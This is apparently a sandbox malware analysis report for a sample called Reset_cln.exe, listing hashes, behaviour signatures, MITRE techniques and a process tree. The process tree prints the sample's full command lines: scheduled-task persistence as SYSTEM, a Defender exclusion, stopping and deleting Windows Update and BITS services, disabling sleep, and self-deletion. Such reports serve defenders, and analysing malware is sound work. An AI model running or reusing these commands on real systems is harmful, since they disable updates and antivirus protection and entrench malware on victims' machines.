14541883dc05d0e8e954b1de4d5c717ab7a215fa2472332971c6695038324371

General

Target

Reset_cln.exe
Size

9.4MB
MD5

61c98e80e70b0f3e3951dccff351644c
SHA1

541c48539d943c6bd261127829f1e29904a5b945
SHA256

14541883dc05d0e8e954b1de4d5c717ab7a215fa2472332971c6695038324371
SHA512

fba3db8b8c9be2a5e2646bcb313e947d5634989ffee31501f40f1d0c14f6633e39161d2c35393c3a33fedf65674cab2fcd55f817e03a803216db6d94ad5183ca
SSDEEP

196608:anzwdq6YMOwsdK+kVylAou8uuYV0Jui6cCVIAKdG1PT:AkUMOwoKvVypLUVNn7KdaT

Score

10^/10

evasion

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

Processes:

Reset_cln.exe

description	pid	process	target process
PID 2620 created 1048	2620	Reset_cln.exe	Explorer.EXE
PID 2620 created 1048	2620	Reset_cln.exe	Explorer.EXE
PID 2620 created 1048	2620	Reset_cln.exe	Explorer.EXE
PID 2620 created 1048	2620	Reset_cln.exe	Explorer.EXE
PID 2620 created 1048	2620	Reset_cln.exe	Explorer.EXE

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

Reset_cln.exe

pid process

2620 Reset_cln.exe
2620 Reset_cln.exe
Drops file in Program Files directory 1 IoCs

Processes:

Reset_cln.exe

description ioc process

File created C:\Program Files\WindowsServices\WindowsAutHost Reset_cln.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

944 sc.exe
1700 sc.exe
4572 sc.exe
2696 sc.exe
4560 sc.exe

description	ioc	process
File created	C:\Program Files\WindowsServices\WindowsAutHost	Reset_cln.exe

pid	process
944	sc.exe
1700	sc.exe
4572	sc.exe
2696	sc.exe
4560	sc.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

Processes:

Reset_cln.exepowershell.exepowershell.exepowershell.exe

pid	process
2620	Reset_cln.exe
2620	Reset_cln.exe
2620	Reset_cln.exe
2620	Reset_cln.exe
3632	powershell.exe
3632	powershell.exe
2620	Reset_cln.exe
2620	Reset_cln.exe
2620	Reset_cln.exe
2620	Reset_cln.exe
2620	Reset_cln.exe
2620	Reset_cln.exe
4440	powershell.exe
4440	powershell.exe
2620	Reset_cln.exe
2620	Reset_cln.exe
2620	Reset_cln.exe
2620	Reset_cln.exe
1172	powershell.exe
1172	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	3632	powershell.exe
Token: SeDebugPrivilege	4440	powershell.exe
Token: SeShutdownPrivilege	3064	powercfg.exe
Token: SeCreatePagefilePrivilege	3064	powercfg.exe
Token: SeShutdownPrivilege	3600	powercfg.exe
Token: SeCreatePagefilePrivilege	3600	powercfg.exe
Token: SeShutdownPrivilege	2992	powercfg.exe
Token: SeCreatePagefilePrivilege	2992	powercfg.exe
Token: SeShutdownPrivilege	4588	powercfg.exe
Token: SeCreatePagefilePrivilege	4588	powercfg.exe
Token: SeIncreaseQuotaPrivilege	4440	powershell.exe
Token: SeSecurityPrivilege	4440	powershell.exe
Token: SeTakeOwnershipPrivilege	4440	powershell.exe
Token: SeLoadDriverPrivilege	4440	powershell.exe
Token: SeSystemProfilePrivilege	4440	powershell.exe
Token: SeSystemtimePrivilege	4440	powershell.exe
Token: SeProfSingleProcessPrivilege	4440	powershell.exe
Token: SeIncBasePriorityPrivilege	4440	powershell.exe
Token: SeCreatePagefilePrivilege	4440	powershell.exe
Token: SeBackupPrivilege	4440	powershell.exe
Token: SeRestorePrivilege	4440	powershell.exe
Token: SeShutdownPrivilege	4440	powershell.exe
Token: SeDebugPrivilege	4440	powershell.exe
Token: SeSystemEnvironmentPrivilege	4440	powershell.exe
Token: SeRemoteShutdownPrivilege	4440	powershell.exe
Token: SeUndockPrivilege	4440	powershell.exe
Token: SeManageVolumePrivilege	4440	powershell.exe
Token: 33	4440	powershell.exe
Token: 34	4440	powershell.exe
Token: 35	4440	powershell.exe
Token: 36	4440	powershell.exe
Token: SeIncreaseQuotaPrivilege	4440	powershell.exe
Token: SeSecurityPrivilege	4440	powershell.exe
Token: SeTakeOwnershipPrivilege	4440	powershell.exe
Token: SeLoadDriverPrivilege	4440	powershell.exe
Token: SeSystemProfilePrivilege	4440	powershell.exe
Token: SeSystemtimePrivilege	4440	powershell.exe
Token: SeProfSingleProcessPrivilege	4440	powershell.exe
Token: SeIncBasePriorityPrivilege	4440	powershell.exe
Token: SeCreatePagefilePrivilege	4440	powershell.exe
Token: SeBackupPrivilege	4440	powershell.exe
Token: SeRestorePrivilege	4440	powershell.exe
Token: SeShutdownPrivilege	4440	powershell.exe
Token: SeDebugPrivilege	4440	powershell.exe
Token: SeSystemEnvironmentPrivilege	4440	powershell.exe
Token: SeRemoteShutdownPrivilege	4440	powershell.exe
Token: SeUndockPrivilege	4440	powershell.exe
Token: SeManageVolumePrivilege	4440	powershell.exe
Token: 33	4440	powershell.exe
Token: 34	4440	powershell.exe
Token: 35	4440	powershell.exe
Token: 36	4440	powershell.exe
Token: SeIncreaseQuotaPrivilege	4440	powershell.exe
Token: SeSecurityPrivilege	4440	powershell.exe
Token: SeTakeOwnershipPrivilege	4440	powershell.exe
Token: SeLoadDriverPrivilege	4440	powershell.exe
Token: SeSystemProfilePrivilege	4440	powershell.exe
Token: SeSystemtimePrivilege	4440	powershell.exe
Token: SeProfSingleProcessPrivilege	4440	powershell.exe
Token: SeIncBasePriorityPrivilege	4440	powershell.exe
Token: SeCreatePagefilePrivilege	4440	powershell.exe
Token: SeBackupPrivilege	4440	powershell.exe
Token: SeRestorePrivilege	4440	powershell.exe
Token: SeShutdownPrivilege	4440	powershell.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

cmd.execmd.execmd.exepowershell.exe

description	pid	process	target process
PID 2004 wrote to memory of 1700	2004	cmd.exe	sc.exe
PID 2004 wrote to memory of 1700	2004	cmd.exe	sc.exe
PID 2004 wrote to memory of 4572	2004	cmd.exe	sc.exe
PID 2004 wrote to memory of 4572	2004	cmd.exe	sc.exe
PID 2004 wrote to memory of 2696	2004	cmd.exe	sc.exe
PID 2004 wrote to memory of 2696	2004	cmd.exe	sc.exe
PID 2004 wrote to memory of 4560	2004	cmd.exe	sc.exe
PID 2004 wrote to memory of 4560	2004	cmd.exe	sc.exe
PID 2004 wrote to memory of 944	2004	cmd.exe	sc.exe
PID 2004 wrote to memory of 944	2004	cmd.exe	sc.exe
PID 2004 wrote to memory of 4392	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 4392	2004	cmd.exe	reg.exe
PID 4220 wrote to memory of 3064	4220	cmd.exe	powercfg.exe
PID 4220 wrote to memory of 3064	4220	cmd.exe	powercfg.exe
PID 4220 wrote to memory of 3600	4220	cmd.exe	powercfg.exe
PID 4220 wrote to memory of 3600	4220	cmd.exe	powercfg.exe
PID 4220 wrote to memory of 2992	4220	cmd.exe	powercfg.exe
PID 4220 wrote to memory of 2992	4220	cmd.exe	powercfg.exe
PID 4220 wrote to memory of 4588	4220	cmd.exe	powercfg.exe
PID 4220 wrote to memory of 4588	4220	cmd.exe	powercfg.exe
PID 2004 wrote to memory of 4072	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 4072	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 3640	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 3640	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 4944	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 4944	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 624	2004	cmd.exe	reg.exe
PID 2004 wrote to memory of 624	2004	cmd.exe	reg.exe
PID 220 wrote to memory of 4952	220	cmd.exe	choice.exe
PID 220 wrote to memory of 4952	220	cmd.exe	choice.exe
PID 1172 wrote to memory of 4368	1172	powershell.exe	schtasks.exe
PID 1172 wrote to memory of 4368	1172	powershell.exe	schtasks.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1048

C:\Users\Admin\AppData\Local\Temp\Reset_cln.exe
"C:\Users\Admin\AppData\Local\Temp\Reset_cln.exe"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2620

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#oqljx#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsAutHost' /tr '''C:\Program Files\WindowsServices\WindowsAutHost''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsServices\WindowsAutHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsAutHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsAutHost" /t REG_SZ /f /d 'C:\Program Files\WindowsServices\WindowsAutHost' }
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4440

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3632

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:2004

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1700

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:4572

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:2696

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:4560

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:944

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:4392

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:4072

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:3640

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:4944

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:624

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:4220

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3064

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3600

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2992

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4588

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Reset_cln.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:220

C:\Windows\System32\choice.exe
choice /C Y /N /D Y /T 3
3⤵
PID:4952

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xkiteqnm#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WindowsAutHost" } Else { "C:\Program Files\WindowsServices\WindowsAutHost" }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1172

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn WindowsAutHost
3⤵
PID:4368

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

2

T1031

Privilege Escalation

Defense Evasion

Impair Defenses

Modify Registry

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d0f3eff52698c0eab8a2c8bd1d9f7c18

SHA1
4292ae775443749c6c2281dac800d86b4bdde07e

SHA256
b16c74cbb71b5ba7bbf32696feb6869d9a0fa3bac42042a3fe8f3d48e2d5dbf6

SHA512
642b5d51a4cec6094e6789f29eb68885068583a08e102606b7ed2ace036cacd8b3bc428cef6f8cbfaadf5644fe52149211f7fc6774fc4ff458bd76cfae703cfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d0f3eff52698c0eab8a2c8bd1d9f7c18

SHA1
4292ae775443749c6c2281dac800d86b4bdde07e

SHA256
b16c74cbb71b5ba7bbf32696feb6869d9a0fa3bac42042a3fe8f3d48e2d5dbf6

SHA512
642b5d51a4cec6094e6789f29eb68885068583a08e102606b7ed2ace036cacd8b3bc428cef6f8cbfaadf5644fe52149211f7fc6774fc4ff458bd76cfae703cfd

Download Submit
memory/624-153-0x0000000000000000-mapping.dmp

Download
memory/944-140-0x0000000000000000-mapping.dmp

Download
memory/1172-161-0x00007FFAE3D80000-0x00007FFAE4841000-memory.dmp

Filesize
10.8MB

Download
memory/1172-164-0x00007FFAE3D80000-0x00007FFAE4841000-memory.dmp

Filesize
10.8MB

Download
memory/1172-160-0x00007FFAE3D80000-0x00007FFAE4841000-memory.dmp

Filesize
10.8MB

Download
memory/1700-136-0x0000000000000000-mapping.dmp

Download
memory/2620-133-0x00007FF664640000-0x00007FF6656C1000-memory.dmp

Filesize
16.5MB

Download
memory/2620-152-0x00007FF664640000-0x00007FF6656C1000-memory.dmp

Filesize
16.5MB

Download
memory/2620-158-0x00007FF664640000-0x00007FF6656C1000-memory.dmp

Filesize
16.5MB

Download
memory/2696-138-0x0000000000000000-mapping.dmp

Download
memory/2992-144-0x0000000000000000-mapping.dmp

Download
memory/3064-142-0x0000000000000000-mapping.dmp

Download
memory/3600-143-0x0000000000000000-mapping.dmp

Download
memory/3632-147-0x00007FFAE3C90000-0x00007FFAE4751000-memory.dmp

Filesize
10.8MB

Download
memory/3632-146-0x00007FFAE3C90000-0x00007FFAE4751000-memory.dmp

Filesize
10.8MB

Download
memory/3632-135-0x0000018BFBCC0000-0x0000018BFBCE2000-memory.dmp

Filesize
136KB

Download
memory/3640-149-0x0000000000000000-mapping.dmp

Download
memory/4072-148-0x0000000000000000-mapping.dmp

Download
memory/4368-163-0x0000000000000000-mapping.dmp

Download
memory/4392-141-0x0000000000000000-mapping.dmp

Download
memory/4440-154-0x00007FFAE3C90000-0x00007FFAE4751000-memory.dmp

Filesize
10.8MB

Download
memory/4440-157-0x00007FFAE3C90000-0x00007FFAE4751000-memory.dmp

Filesize
10.8MB

Download
memory/4440-150-0x00007FFAE3C90000-0x00007FFAE4751000-memory.dmp

Filesize
10.8MB

Download
memory/4560-139-0x0000000000000000-mapping.dmp

Download
memory/4572-137-0x0000000000000000-mapping.dmp

Download
memory/4588-145-0x0000000000000000-mapping.dmp

Download
memory/4944-151-0x0000000000000000-mapping.dmp

Download
memory/4952-159-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads